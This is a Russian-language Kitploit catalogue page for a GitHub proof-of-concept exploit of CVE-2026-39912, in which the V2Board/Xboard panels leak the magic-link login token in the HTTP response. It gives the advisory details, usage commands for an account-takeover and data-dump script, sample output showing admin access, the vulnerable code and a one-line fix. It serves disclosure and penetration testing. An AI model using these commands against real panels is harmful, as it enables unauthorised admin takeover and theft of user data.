Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-39912 — Xboard / V2Board: несанкционированный захват аккаунта — утечка токена Magic Link (CVE-2026-39912) | Kitploit
Инструменты/GitHubGitHub/chocapikk/cve-2026-39912
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на ПроникновениеАутентификация
GitHubchocapikk/cve-2026-39912

CVE-2026-39912

Xboard / V2Board: несанкционированный захват аккаунта — утечка токена Magic Link (CVE-2026-39912)

Репозиторий
24 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

CVE-2026-39912 — Xboard / V2Board: захват учётной записи без авторизации

Утечка токена magic-ссылки в loginWithMailLink

CVECVE-2026-39912
CVSS9.1 (критический)
CWECWE-201 (вставка конфиденциальной информации в отправляемые данные)
Затронутые версииV2Board с 1.6.1 по 1.7.4 включительно / Xboard все версии до 0.1.9+
ИсправленоПока нет (V2Board заброшен с июня 2023 года)
Раскрыто2026-04-09
АвторValentin Lobstein (Chocapikk)
Разборchocapikk.com
PR с исправлениемV2Board #981 / Xboard #873

TL;DR

Эндпоинт loginWithMailLink возвращает magic-ссылку для входа непосредственно в теле HTTP-ответа, а не отправляет её только по электронной почте. Неаутентифицированный злоумышленник, знающий зарегистрированный email, может захватить любую учётную запись — включая администратора — за два HTTP-запроса.

Затронутое ПО

  • V2Board — панель управления прокси-протоколами с открытым исходным кодом (8,7 тыс. звёзд, заброшен)
  • Xboard — форк V2Board (4+ тыс. звёзд, активно поддерживается)

Обе являются широко распространёнными VPN/прокси-панелями, в основном в Китае. По данным ZoomEye, в интернете доступно более 7000 экземпляров.

Требования

  • login_with_mail_link_enable должен быть включён в настройках администратора (по умолчанию выключен)
  • Действительный зарегистрированный email-адрес

Использование

root@kitploit:~
# Install dependencies
pip install requests

# Account takeover + data dump
python3 exploit.py http://target:7001 [email protected]

# Save dump to file
python3 exploit.py http://target:7001 [email protected] -o dump.json

Демонстрация

root@kitploit:~
$ python3 exploit.py http://target:7001 [email protected]

 Xboard / V2Board - Unauth Account Takeover
 Magic Link Token Leak (CVE-2026-39912) | by Choc
 V2Board >= 1.6.1 | Xboard <= 0.1.9+
 45 min from git clone to is_admin: true

[INFO] Requesting magic link for [email protected]
[INFO] Leaked: http://target:7001/#/login?verify=267bdf61...&redirect=dashboard
[INFO] Authenticated (admin=True)
[INFO] User Info: OK
[INFO] Subscription: OK
[INFO] Active Sessions: OK
[INFO] Stats: OK

{
  "auth": {
    "auth_data": "Bearer qCU2d9hS...",
    "is_admin": true
  },
  "dump": {
    "User Info": {
      "email": "[email protected]",
      "uuid": "12fcb57d-e908-420e-a7aa-b5f7e7bd3695",
      ...
    },
    "Subscription": {
      "subscribe_url": "http://target:7001/s/324396af...",
      ...
    },
    "Active Sessions": [ ... ]
  }
}

Ошибка

V2Board (app/Http/Controllers/Passport/AuthController.php):

root@kitploit:~
SendEmailJob::dispatch([...]);

return response([
    'data' => $link   // Token leaked to caller
]);

Xboard (app/Services/Auth/MailLinkService.php):

root@kitploit:~
$this->sendMailLinkEmail($user, $link);

return [true, $link]; // Same bug, inherited from fork

Исправление

root@kitploit:~
- return [true, $link];
+ return [true, true];

Ссылки

  • V2Board — уязвимый код (строка 71)
  • Xboard — уязвимый код (строка 49)
  • Исходный коммит, в котором появилась ошибка (2022-06-27)
Скачать инструмент